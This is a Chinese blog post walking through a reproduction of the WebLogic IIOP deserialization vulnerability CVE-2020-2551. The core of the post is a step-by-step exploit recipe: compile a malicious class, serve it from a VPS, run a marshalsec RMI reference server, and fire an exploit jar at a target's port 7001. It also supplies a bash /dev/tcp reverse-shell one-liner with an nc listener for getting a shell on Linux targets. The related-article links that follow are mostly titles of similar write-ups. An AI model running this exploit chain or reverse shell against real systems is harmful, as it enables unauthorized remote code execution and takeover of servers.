Weblogic RMI-IIOP(cve-2020-2551)复现

最新推荐文章于 2024-07-15 17:36:21 发布
最新推荐文章于 2024-07-15 17:36:21 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hibari_18/article/details/105845982
版权

百度weblogic 搜索日期20200429

0x01 复现

RMI方式:
1.vps 生成exp.class(示例为windows弹计算器,如果想反弹linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然后vps用nc -lvvp 4444 监听本地端口即可,用java1.6版本编译成功率高)
javac -source 1.6 -target 1.6 exp.java
2.vps 在当前目录开一个web服务,记得在vps上开防火墙策略
python -m SimpleHTTPServer 80(python2)
python3 -m http.server 80(python3)
3.vps 通过marshalsec开放JRMP监听本地端口 2222,调用RMI服务(#后的内容代表调用的class文件名)
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://vps/#exp” 2222
4.本地 攻击,使目标服务器访问vps的2222端口,运行exp
java -jar CVE-2020-2551-master.jar 目标ip 7001 rmi://vps:2222/exp
ps:最后一步最好在本机执行,vps上可能会遇到环境不一致的问题。(op

最低0.47元/天 解锁文章
hibari_18
关注
专栏目录
CVE-2020-2551 深入 IIOP 检测与 Non-Java(Yak) 利用
小王的储物间
03-29 549
用一些自己的理解介绍一些相关名词。
Weblogic CVE-2020-2551复现
热门推荐
迷风小白
06-02 1万+
0x00 前言 Weblogic IIOP 反序列化 0x01 漏洞环境 所有环境都是建立在java环境的基础上,jdk自行下载安装,本机环境jdk 1.8 环境1:vulub-weblogic-CVE-2017-10271 环境2:本地搭建Windows weblogic下载 weblogic 10.3.6安装步骤 搭建完成以后,启动weblogic访问如下图所示即为搭建成功 0x02 漏洞利用 这里我们采用环境2在本地搭建 win7:192.168.111.18(虚拟机) win10:192.168
web反序列化漏洞原理/Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析_新手白客教学
最新发布
程序员六七的博客
07-15 1063
安全客 - 安全资讯平台
Weblogic IIOP协议反序列化(CVE-2020-2551漏洞复现
Boom!脑洞大爆炸的博客
11-11 2224
Weblogic IIOP协议反序列化(CVE-2020-2551复现
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞复现
sechelper的博客
01-11 1333
cve漏洞详细复现漏洞利用,反弹shell,工具分享
weblogic 反序列化 (CVE-2020-2551漏洞复现(vulfocus)
qq_40646572的博客
04-27 2404
weblogic 反序列化 (CVE-2020-2551漏洞是基于IIOP协议执行远程代码进行利用。
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
qq_30302577的博客
04-01 7703
文章目录前言0x01 漏洞说明0x02 影响版本:0x03 Weblogic环境搭建0x04 漏洞利用0x05 漏洞修复方案1.使用 Oracle 官方安全补丁进行更新修复2.如果不依赖T3协议进行JVM通信,用户可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。0x06 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年1月15日,O...
WebLogic CVE-2020-2551漏洞
糖小喵
05-19 1671
预备知识 主要是利用IIOP协议进行的攻击。从0开始学习复现这个洞不免又会设计到Java反序列化漏洞中那些老生常谈的名词理解,涉及到Java反序列化中的一些协议、行为、结构。 RMI、JRMP LDAP 主要充当目录服务的协议 ...
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
玄道的网安博客
03-06 1403
漏洞概述 攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 IIOP协议以Java接口的形式对远程对象进行访问,默认启用。 影响版本 weblogic 10.3.6 weblogic 12.1.3.0 weblogic 12.2.1.3.0 weblogic 12.2.1.4.0 环境搭建 下载地址 https://www.oracle.com/m...
CVE-2020-2551.zip
08-28
CVE-2020-2551复现
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-2555:CVE-2020-2555 Python POC
04-15
CVE-2020-2555 python CVE-2020-2555.py ip port test.ser
Web安全高级漏洞挖掘班 第二期 开班啦~
Ms08067安全实验室
11-05 553
文章来源|MS08067 Web安全高级漏洞挖掘班8.23号我们开启了“Web安全高级攻防实战班”第一期,感谢广大学员的支持,第一期班有收获也有不足,今天第二期又如约而至了!根据第一期班同...
漏洞复现WebLogic反序列化远程代码执行漏洞(cve-2020-2555)
HCIEMAYU的博客
07-17 322
WebLogic是Oracle推出的application server,是Web应用系统必不可少的组件,其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性强、快速开发等多种特性。大多数未及时更新的Weblogic组件存在严重的漏洞,导致其成为攻击者攻击的重点目标。,将java版本切换至jdk1.8(如果切换不成功,用root权限尝试切换一下试试)配置页面中,进入安全选项卡页面,点击筛选器,配置筛选器。4、输入URL,回显选择FileOutputStream,进行漏洞验证。
漫谈 WebLogic-CVE-2020-2551
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
01-14 1489
本文源自:https://paper.seebug.org/1149/#jdk 作者:r4v3zn@白帽汇安全研究院本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!投稿邮箱:paper@seebug.org 背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞的分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效..
jrmp协议_从0学习WebLogic CVE20202551漏洞
weixin_33796288的博客
01-14 244
最近遇到的实际环境为weblogic,所以这里顺便总结下测2020-2551的一些相关的点2551也是学习了很多优秀的师傅文章,非常感谢0X00 漏洞利用基础学习从0开始学习复现这个洞不免又会设计到Java反序列化漏洞中那些老生常谈的名词理解,涉及到Java反序列化中的一些协议、行为、结构,但个人文中偏向于结果导向,对于涉及的上述名词解释不会过多官方解释,直接说上自己认为最简单的理解,如有偏差望师...
漫谈-Weblogic-CVE-2020-2551
Ms08067安全实验室
05-01 4784
背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。其中 CVE-2020-2551 漏洞,互联网中公布...
Weblogic IIOP反序列化漏洞CVE-2020-2551
chaojixiaojingang
01-08 2182
1.漏洞描述 Weblogic IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 2.影响版本 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 3.漏洞环境搭建 所有环境都是建立在java环境...
weblogic-cve-2020-25516
07-25
C知道: 对于您提到的Weblogic漏洞CVE-2020-25516,这是一个已经被公开披露的漏洞,它影响了Oracle WebLogic Server的某些版本。 具体来说,这个漏洞是由于WebLogic Server管理控制台的不当权限验证机制所导致的。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值